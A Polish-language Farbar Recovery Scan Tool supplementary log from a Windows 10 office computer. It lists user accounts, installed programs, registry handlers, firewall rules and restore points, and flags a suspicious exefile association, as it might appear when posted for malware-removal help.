Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 09-09-2020 Uruchomiony przez Biuro 1 (11-09-2020 10:32:24) Uruchomiony z C:\Users\Biuro 1\Desktop Windows 10 Pro Wersja 2004 19041.450 (X64) (2020-07-24 13:00:53) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-3663128269-3686145600-3810933498-500 - Administrator - Disabled) Biuro 1 (S-1-5-21-3663128269-3686145600-3810933498-1000 - Administrator - Enabled) => C:\Users\Biuro 1 Gość (S-1-5-21-3663128269-3686145600-3810933498-501 - Limited - Disabled) Konto domyślne (S-1-5-21-3663128269-3686145600-3810933498-503 - Limited - Disabled) WDAGUtilityAccount (S-1-5-21-3663128269-3686145600-3810933498-504 - Limited - Disabled) ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 20.012.20043 - Adobe Systems Incorporated) Aplikacje Microsoft 365 dla firm - pl-pl (HKLM\...\O365BusinessRetail - pl-pl) (Version: 16.0.13127.20296 - Microsoft Corporation) Asystent aktualizacji do systemu Windows 10 (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22402 - Microsoft Corporation) ComarchCryptoProvider (HKLM-x32\...\{500d0f0f-e1d7-47ce-8981-09d5a2677654}) (Version: 2.8.4332.6501 - Comarch) ComarchCryptoProvider (HKLM-x32\...\{BF4A73FC-852D-4AEB-994F-629E582E6DDC}) (Version: 2.8.4332.6501 - Comarch) Hidden Common Desktop Agent (HKLM\...\{031A0E14-0413-4C97-9772-2639B782F46F}) (Version: 1.62.0 - OEM) Hidden CrystalDiskInfo 7.6.1 (HKLM-x32\...\CrystalDiskInfo_is1) (Version: 7.6.1 - Crystal Dew World) Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 1.0.6584.81 - Dell) Dell System Detect (HKU\S-1-5-21-3663128269-3686145600-3810933498-1000\...\73f463568823ebbe) (Version: 6.1.0.3 - Dell) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 85.0.4183.102 - Google LLC) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden IBM Data Server Driver Package - IBMDBCL1 (HKLM-x32\...\{9C9AA09E-ECA3-4A00-9282-D882689A3504}) (Version: 11.1.3030.239 - Nazwa firmy) Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1010 - Intel Corporation) Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.1.70.1205 - Intel Corporation) Intel(R) Network Connections 23.1.100.0 (HKLM\...\PROSetDX) (Version: 23.1.100.0 - Intel) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4229 - Intel Corporation) IrfanView (remove only) (HKLM-x32\...\IrfanView) (Version: 4.38 - Irfan Skiljan) Java 8 Update 231 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180231F0}) (Version: 8.0.2310.11 - Oracle Corporation) Java 8 Update 261 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180261F0}) (Version: 8.0.2610.12 - Oracle Corporation) Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 85.0.564.44 - Microsoft Corporation) Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.135.29 - ) Microsoft OneDrive (HKU\S-1-5-21-3663128269-3686145600-3810933498-1000\...\OneDriveSetup.exe) (Version: 20.143.0716.0003 - Microsoft Corporation) Microsoft Teams (HKU\S-1-5-21-3663128269-3686145600-3810933498-1000\...\Teams) (Version: 1.3.00.21759 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Mozilla Firefox 80.0.1 (x64 pl) (HKLM\...\Mozilla Firefox 80.0.1 (x64 pl)) (Version: 80.0.1 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 80.0.1.7548 - Mozilla) Mozilla Thunderbird 68.12.0 (x86 pl) (HKLM-x32\...\Mozilla Thunderbird 68.12.0 (x86 pl)) (Version: 68.12.0 - Mozilla) Office 16 Click-to-Run Extensibility Component (HKLM\...\{90160000-008C-0000-1000-0000000FF1CE}) (Version: 16.0.13127.20164 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-007E-0000-1000-0000000FF1CE}) (Version: 16.0.13127.20268 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM\...\{90160000-008C-0415-1000-0000000FF1CE}) (Version: 16.0.13127.20164 - Microsoft Corporation) Hidden ONX Magazyn wersja 0.6.5.1700 (HKLM-x32\...\{8306130F-031C-4C11-B055-E108BE3C7C6C}_is1) (Version: 0.6.5.1700 - TriCORE) PC CCID (HKLM\...\{BD69DF65-B294-4F1A-A3BE-B93D813AB1E4}) (Version: 1.0.0 - Gemalto) PL-2303 USB-to-Serial (HKLM-x32\...\{ECC3713C-08A4-40E3-95F1-7D0704F1CE5E}) (Version: 1.6.0 - Prolific Technology INC) Samsung Data Migration (HKLM-x32\...\{D4DE3DB4-7734-47E5-8D92-B80146311406}) (Version: 2.7 - Samsung) Samsung Easy Document Creator (HKLM-x32\...\Samsung Easy Document Creator) (Version: 1.06.44 (2014-10-23) - Samsung Electronics Co., Ltd.) Samsung Easy Printer Manager (HKLM-x32\...\Samsung Easy Printer Manager) (Version: 2.00.01.24 - HP Printing Korea Co., Ltd.) Samsung Network PC Fax (HKLM-x32\...\Samsung Network PC Fax) (Version: 1.11.11 (2014-10-22) - Samsung Electronics Co., Ltd.) Samsung Printer Diagnostics (HKLM-x32\...\Samsung Printer Diagnostics) (Version: 1.0.1.6.11 - Samsung Electronics Co., Ltd.) Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version: 1.01.00:04(2013-04-22) - Samsung Electronics Co., Ltd.) Samsung Scan Process Machine (HKLM-x32\...\Samsung Scan Process Machine) (Version: 1.03.05.28 - Samsung Electronics Co., Ltd.) Hidden Samsung SCX-483x 5x3x Series (HKLM-x32\...\Samsung SCX-483x 5x3x Series) (Version: 1.50 (2015-04-09) - Samsung Electronics Co., Ltd.) Samsung Universal Print Driver 2 (HKLM-x32\...\Samsung Universal Print Driver 2) (Version: 2.50.06.00 - Samsung Electronics Co., Ltd.) Samsung Universal Scan Driver (HKLM-x32\...\Samsung Universal Scan Driver) (Version: 1.2.19.0 - Samsung Electronics Co., Ltd.) SetIP (HKLM-x32\...\SetIP) (Version: 1.05.08.00 - Samsung Electronics Co., Ltd.) SNS Upload for Easy Document Creator (HKLM-x32\...\{B6B5F07C-88D5-49D3-A1A7-A6D4BC37DCCC}) (Version: 1.0.0 - Samsung Electronics Co.,Ltd) SUNIX Multi-IO Controller (HKLM-x32\...\{A8D5B39E-815D-44BC-AC52-657FE3D2E21D}) (Version: 7.2.0.0 - SUNIX Co., Ltd.) Teams Machine-Wide Installer (HKLM-x32\...\{731F6BAA-A986-45A4-8936-7C3AAAAA760B}) (Version: 1.2.0.24753 - Microsoft Corporation) Total Commander 64-bit (Remove or Repair) (HKLM-x32\...\Totalcmd64) (Version: 8.51a - Ghisler Software GmbH) Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{F814D094-197F-43C8-87FA-3210BB780486}) (Version: 2.53.0.0 - Microsoft Corporation) UpdateAssistant (HKLM\...\{B0D957AA-9ADA-4396-9757-B7EF0FCA648C}) (Version: 1.17.0.0 - Microsoft Corporation) Hidden Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version: - ) WinRAR 5.50 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH) Z12 6.0.2 (HKLM-x32\...\Z12_2016_is1) (Version: - ) ZebraDesigner 2 (HKLM-x32\...\{CAF27047-C758-4927-9699-BBB0C2B0E56F}) (Version: 2.5.0.9325 - Zebra Technologies Corporation) Hidden ZebraDesigner 2 (HKLM-x32\...\ZebraDesigner 2) (Version: 2.5.0.9325 - Zebra Technologies Corporation) Packages: ========= Dodatek Aparat multimediów dla aplikacji Zdjęcia -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-09-16] (Microsoft Corporation) Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-16] (Microsoft Corporation) [MS Ad] Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-16] (Microsoft Corporation) [MS Ad] Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x64__8wekyb3d8bbwe [2020-08-20] (Microsoft Studios) [MS Ad] MSN Sport -> C:\Program Files\WindowsApps\Microsoft.BingSports_4.36.20714.0_x64__8wekyb3d8bbwe [2020-04-01] (Microsoft Corporation) [MS Ad] Samsung Printer Experience -> C:\Program Files\WindowsApps\SAMSUNGELECTRONICSCO.LTD.SamsungPrinterExperience_1.3.15.0_x64__3c1yjt4zspk6g [2017-07-05] (Samsung Electronics Co. Ltd.) WindowsDVDPlayer -> C:\Program Files\WindowsApps\Microsoft.WindowsDVDPlayer_3.6.13291.0_x64__8wekyb3d8bbwe [2016-07-28] (Microsoft Corporation) ==================== Niestandardowe rejestracje CLSID (filtrowane): ============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) CustomCLSID: HKU\S-1-5-21-3663128269-3686145600-3810933498-1000_Classes\CLSID\{04271989-C4D2-C133-99ED-F661EF8EEE5C} -> [OneDrive - P.P.U. ESPA Paweł Szumski] => C:\Users\Biuro 1\OneDrive - P.P.U. ESPA Paweł Szumski [2019-07-04 15:54] CustomCLSID: HKU\S-1-5-21-3663128269-3686145600-3810933498-1000_Classes\CLSID\{19A6E644-14E6-4A60-B8D7-DD20610A871D}\InprocServer32 -> C:\Users\Biuro 1\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20130.1\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-3663128269-3686145600-3810933498-1000_Classes\CLSID\{CB965DF1-B8EA-49C7-BDAD-5457FDC1BF92}\InprocServer32 -> C:\Users\Biuro 1\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.20130.1\x64\Microsoft.Teams.AddinLoader.dll (Microsoft Corporation -> Microsoft Corporation) ContextMenuHandlers1: [!NetFax0] -> {35308360-D4A6-436D-B701-1FEC7E96BA48} => C:\Windows\system32\spool\drivers\x64\3\NetFaxShell64.dll [2014-10-22] (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) ContextMenuHandlers1: [!NetFax1] -> {35308360-D4A6-436D-B701-1FEC7E96BA48} => C:\Windows\system32\spool\drivers\x64\3\NetFaxShell64.dll [2014-10-22] (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) ContextMenuHandlers1: [!NetFax2] -> {35308360-D4A6-436D-B701-1FEC7E96BA48} => C:\Windows\system32\spool\drivers\x64\3\NetFaxShell64.dll [2014-10-22] (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) ContextMenuHandlers1: [!NetFax3] -> {35308360-D4A6-436D-B701-1FEC7E96BA48} => C:\Windows\system32\spool\drivers\x64\3\NetFaxShell64.dll [2014-10-22] (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) ContextMenuHandlers1: [!NetFax4] -> {35308360-D4A6-436D-B701-1FEC7E96BA48} => C:\Windows\system32\spool\drivers\x64\3\NetFaxShell64.dll [2014-10-22] (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) ContextMenuHandlers1: [!NetFax5] -> {35308360-D4A6-436D-B701-1FEC7E96BA48} => C:\Windows\system32\spool\drivers\x64\3\NetFaxShell64.dll [2014-10-22] (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) ContextMenuHandlers1: [!NetFax6] -> {35308360-D4A6-436D-B701-1FEC7E96BA48} => C:\Windows\system32\spool\drivers\x64\3\NetFaxShell64.dll [2014-10-22] (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) ContextMenuHandlers1: [!NetFax7] -> {35308360-D4A6-436D-B701-1FEC7E96BA48} => C:\Windows\system32\spool\drivers\x64\3\NetFaxShell64.dll [2014-10-22] (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-09-13] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-09-13] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers5: [Gadgets] -> {6B9228DA-9C15-419e-856C-19E768A13BDC} => -> Brak pliku ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\WINDOWS\system32\igfxpph.dll [2017-03-09] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-09-13] (win.rar GmbH -> Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-09-13] (win.rar GmbH -> Alexander Roshal) ==================== Codecs (filtrowane) ==================== ==================== Skróty & WMI ======================== (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ShortcutWithArgument: C:\Users\Biuro 1\AppData\Local\Google\Chrome\User Data\Program uruchamiający aplikacje Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --show-app-list ShortcutWithArgument: C:\Users\Biuro 1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome\Program uruchamiający aplikacje Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --show-app-list ==================== Załadowane moduły (filtrowane) ============= 2018-01-31 14:36 - 2018-01-31 14:36 - 000419328 ____R () [Brak podpisu cyfrowego] C:\Program Files\Intel\Wired Networking\NCS2\Agent\AdapterAgnt.DLL 2018-01-31 14:38 - 2018-01-31 14:38 - 000453120 ____R () [Brak podpisu cyfrowego] C:\Program Files\Intel\Wired Networking\NCS2\WMIPROV\Ncs2Provider.dll 2015-05-13 11:28 - 2013-01-24 01:19 - 001892352 _____ (Apache Software Foundation) [Brak podpisu cyfrowego] C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\xerces-c_2_7.dll 2015-05-13 11:28 - 2013-01-24 01:19 - 000069632 _____ (Intel Corporation) [Brak podpisu cyfrowego] C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\StatusStrings.dll 2018-01-31 14:34 - 2018-01-31 14:34 - 001619968 ____R (Intel(R) Corporation) [Brak podpisu cyfrowego] C:\Program Files\Intel\Wired Networking\NCS2\Agent\CoreAgnt.dll 2018-01-31 14:35 - 2018-01-31 14:35 - 000411136 _____ (Intel(R) Corporation) [Brak podpisu cyfrowego] C:\Program Files\Intel\Wired Networking\NCS2\Agent\Rule.DLL 2018-01-31 14:36 - 2018-01-31 14:36 - 000902144 ____R (Intel(R) Corporation) [Brak podpisu cyfrowego] C:\Program Files\Intel\Wired Networking\NCS2\Agent\VlanAgent.dll 2018-01-31 14:37 - 2018-01-31 14:37 - 000636416 ____R (Intel(R) Corporation) [Brak podpisu cyfrowego] C:\Program Files\Intel\Wired Networking\NCS2\WMIPROV\Ncs2Core.dll 2018-01-31 14:37 - 2018-01-31 14:37 - 000671232 _____ (Intel(R) Corporation) [Brak podpisu cyfrowego] C:\WINDOWS\SYSTEM32\Ncs2InstUtility.dll 2018-01-25 12:10 - 2018-01-25 12:10 - 000349696 _____ (Intel(R) Corporation) [Brak podpisu cyfrowego] C:\Windows\system32\NCS2Setp.dll 2018-01-31 14:34 - 2018-01-31 14:34 - 004811264 _____ (Intel(R) Corporation) [Brak podpisu cyfrowego] C:\WINDOWS\SYSTEM32\NcsColib.dll ==================== Alternate Data Streams (filtrowane) ======== ==================== Tryb awaryjny (filtrowane) ================== ==================== Powiązania plików (filtrowane) ================= (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) HKU\S-1-5-21-3663128269-3686145600-3810933498-1000\Software\Classes\exefile: <==== UWAGA ==================== Internet Explorer - Witryny zaufane i z ograniczeniami ========== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) IE trusted site: HKU\S-1-5-21-3663128269-3686145600-3810933498-1000\...\dell.com -> dell.com IE trusted site: HKU\S-1-5-21-3663128269-3686145600-3810933498-1000\...\samsungsetup.com -> hxxp://www.samsungsetup.com IE trusted site: HKU\S-1-5-21-3663128269-3686145600-3810933498-1000\...\sharepoint.com -> hxxps://ppuespa.sharepoint.com ==================== Hosts - zawartość: ========================= (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 04:34 - 2009-06-10 23:00 - 000000824 _____ C:\WINDOWS\system32\drivers\etc\hosts 2017-09-07 11:36 - 2017-09-13 16:38 - 000000442 _____ C:\WINDOWS\system32\drivers\etc\hosts.ics 192.168.0.48 Biuro1-Komputer.mshome.net # 2022 9 1 12 14 38 15 136 ==================== Inne obszary =========================== (Obecnie brak automatycznej naprawy dla tej sekcji.) HKLM\System\CurrentControlSet\Control\Session Manager\Environment\\Path -> C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\ProgramData\Oracle\Java\javapath;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\;%SYSTEMROOT%\System32\OpenSSH\ HKU\S-1-5-21-3663128269-3686145600-3810933498-1000\Control Panel\Desktop\\Wallpaper -> c:\windows\web\wallpaper\theme1\img2.jpg DNS Servers: 79.135.160.6 - 79.135.160.8 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Warn) HKLM\software\microsoft\Windows\CurrentVersion\Telephony\Providers => ProviderFileName2 -> ndptsp.tsp (Brak pliku) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == (Załączenie wejścia w fixlist spowoduje jego usunięcie.) HKLM\...\StartupApproved\Run: => "CDAServer" ==================== Reguły Zapory systemu Windows (filtrowane) ================ (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [{53048608-50F5-4CC2-8C5B-00849EF8794A}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{AC32FE2D-CC4A-44EA-8229-F590DFD7B908}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{33D998B6-5DCB-4D5B-92A8-183DA66F0E74}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{66F083B2-AD75-4385-A486-121073F6F9D3}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{D15B1D0C-40E8-4AA9-BF70-B9BA650486D5}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe (Samsung Electronics CO., LTD. -> ) FirewallRules: [{1E27BB03-9270-4324-8AF1-B7431D3F24AE}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\EPM2Migrator.exe (HP Inc. -> ) FirewallRules: [{265EAD25-6F76-4E67-8AAB-C978B597E46B}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\EPM2AlertList.exe (HP Inc. -> HP Printing Korea Co., Ltd.) FirewallRules: [{BB3D0710-DE91-4B4C-9037-FAE5DDA07099}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\OrderSupplies.exe (HP Inc. -> HP Printing Korea Co., Ltd.) FirewallRules: [{252841D6-8874-4EB2-9171-EFBEBD80ECC7}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\EasyPrinterManagerV2.exe (HP Inc. -> ) FirewallRules: [{1CBDE387-F7CB-4575-844A-2C2C6F7EC0CD}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe (Samsung Electronics CO., LTD. -> ) FirewallRules: [{AC69A52D-E310-43AB-A0F5-FA3673D58329}] => (Allow) C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe (Samsung Electronics CO., LTD. -> ) FirewallRules: [{FF20A0BC-D9C4-48EC-8BF2-A720AB47F064}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) FirewallRules: [{39F2038C-F3C9-4ABA-AE25-CC3FE773C173}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation -> Mozilla Corporation) FirewallRules: [{1FD288E6-4DD6-46AB-8377-9109B18617FB}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe (Samsung Electronics CO., LTD. -> ) FirewallRules: [{16FBCCF1-4E74-48CE-A93D-A1689234E5BD}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe (Samsung Electronics CO., LTD. -> ) FirewallRules: [{1EEDFD5C-6EA9-4B59-AB73-57EBC8907014}] => (Allow) C:\Windows\twain_32\Samsung\SCX5x3x\SCNSearch\USDAgent.exe (Samsung Electronics CO., LTD. -> ) FirewallRules: [{72AF22A1-3A85-41D2-A383-46F74F295EE6}] => (Allow) C:\Windows\twain_32\Samsung\SCX5x3x\SCNSearch\USDAgent.exe (Samsung Electronics CO., LTD. -> ) FirewallRules: [{6A312F59-3AE0-4156-9060-4C3BC28B8071}] => (Allow) C:\Users\Biuro 1\AppData\Local\Microsoft\OneDrive\OneDrive.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{F8E283BC-80F1-4A75-BDB1-46186B917523}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe (Samsung Electronics CO., LTD. -> ) FirewallRules: [{EAC6A775-9C93-4CEB-BFC9-48D77CEA31EE}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ScanCDLM.exe (Samsung Electronics CO., LTD. -> ) FirewallRules: [{153C7640-C8C2-436D-9D21-24083327807A}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe (Samsung Electronics CO., LTD. -> ) FirewallRules: [{73729A35-51B9-4C9B-A12B-5311220E0624}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Scan Driver\ICCUpdater.exe (Samsung Electronics CO., LTD. -> ) FirewallRules: [{07073689-8FCF-4D84-AC13-C88422FBBFE4}] => (Allow) C:\Users\Biuro 1\AppData\Local\Temp\Ins25B8\Setup.exe => Brak pliku FirewallRules: [{806FE0E6-F3ED-4875-B377-8D89129E4DB9}] => (Allow) C:\Users\Biuro 1\AppData\Local\Temp\Ins25B8\Setup.exe => Brak pliku FirewallRules: [{C736B112-175F-4B7C-A7B0-A5ED9E2874F6}] => (Allow) C:\Users\Biuro 1\AppData\Local\Temp\Ins25B8\Setup.exe => Brak pliku FirewallRules: [{021AAF3E-E6BE-4808-8793-108FF27CEA63}] => (Allow) C:\Users\Biuro 1\AppData\Local\Temp\InsA0B1\Setup.exe => Brak pliku FirewallRules: [{75F19268-ED3D-4B26-B08D-2D65E9611D29}] => (Allow) C:\Users\Biuro 1\AppData\Local\Temp\InsA0B1\Setup.exe => Brak pliku FirewallRules: [{69955E5C-D622-4327-993B-3B61577F4A23}] => (Allow) C:\Users\Biuro 1\AppData\Local\Temp\InsA0B1\Setup.exe => Brak pliku FirewallRules: [{F065980C-A819-4650-B5E4-C3465F5AABE0}] => (Allow) C:\Users\Biuro 1\AppData\Local\Temp\Ins5540\Setup.exe => Brak pliku FirewallRules: [{ED5FE06E-53AE-4039-8E72-F3B73E522CCD}] => (Allow) C:\Users\Biuro 1\AppData\Local\Temp\Ins5540\Setup.exe => Brak pliku FirewallRules: [{1751D897-6EB8-4070-B6FA-3DAEBC018837}] => (Allow) C:\Users\Biuro 1\AppData\Local\Temp\Ins5540\Setup.exe => Brak pliku FirewallRules: [{FAF0E62C-7A96-4318-AB2F-97F1AE41CF9A}] => (Allow) C:\Users\Biuro 1\AppData\Local\Temp\InsFE1C\Setup.exe => Brak pliku FirewallRules: [{847F21D8-DB9D-4F4B-B71D-94B5F9324354}] => (Allow) C:\Users\Biuro 1\AppData\Local\Temp\InsFE1C\Setup.exe => Brak pliku FirewallRules: [{00111EEC-F9BD-47D1-B624-C8381C46FAAF}] => (Allow) C:\Users\Biuro 1\AppData\Local\Temp\InsFE1C\Setup.exe => Brak pliku FirewallRules: [{5BC84E2C-EED5-40DA-8F9A-C78B5B55E5F5}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Universal Print Driver 2\PrinterSelector\SUPDApp.exe (Samsung Electronics CO., LTD. -> Samsung Electronics Co., Ltd.) FirewallRules: [{607EA0EB-5ADC-4A40-A3C0-37952179F870}] => (Allow) C:\Users\Biuro 1\AppData\Local\Temp\Ins204C\Setup.exe => Brak pliku FirewallRules: [{3DCE2336-BD8B-4B8B-A6E9-06AA7E0597BE}] => (Allow) C:\Users\Biuro 1\AppData\Local\Temp\Ins204C\Setup.exe => Brak pliku FirewallRules: [{9EBF12CA-9607-4F06-AF8D-877A3A171D6D}] => (Allow) C:\Users\Biuro 1\AppData\Local\Temp\Ins204C\Setup.exe => Brak pliku FirewallRules: [{EBA77774-6DAD-447B-9CE2-DB616A71606C}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\uninstall.exe => Brak pliku FirewallRules: [{EA437125-D98E-4C6B-88C9-3C60540ED358}] => (Allow) C:\Program Files (x86)\Samsung\Easy Printer Manager\uninstall.exe => Brak pliku FirewallRules: [{83FEE537-9BB9-4B63-9FE8-A6318BF14914}] => (Allow) C:\WINDOWS\system32\alg.exe (Microsoft Windows -> Microsoft Corporation) FirewallRules: [{B9955940-72C4-4BF1-B45D-7928B5FF5418}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{79CD8AAD-6487-40F5-8F61-70A74D1AC693}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{F3855F32-8D02-46EE-B806-4AABD6203FBA}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{473B04BC-1179-4191-A579-516967379806}] => (Allow) C:\Program Files\WindowsApps\Microsoft.SkypeApp_15.63.76.0_x86__kzf8qxf38zg5c\Skype\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.) FirewallRules: [{128C48FA-6DC0-4D2C-8AFC-AB0E91FAA348}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe (Microsoft Corporation -> Microsoft Corporation) FirewallRules: [{3D7B5AF9-2121-44DF-B517-0237872A67B3}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC) ==================== Punkty Przywracania systemu ========================= 31-08-2020 07:48:29 Zaplanowany punkt kontrolny 07-09-2020 08:14:56 Zaplanowany punkt kontrolny 09-09-2020 08:09:12 Instalator modułów systemu Windows 11-09-2020 07:58:46 Instalator modułów systemu Windows ==================== Wadliwe urządzenia w Menedżerze urządzeń ============ ==================== Błędy w Dzienniku zdarzeń: ======================== Dziennik Aplikacja: 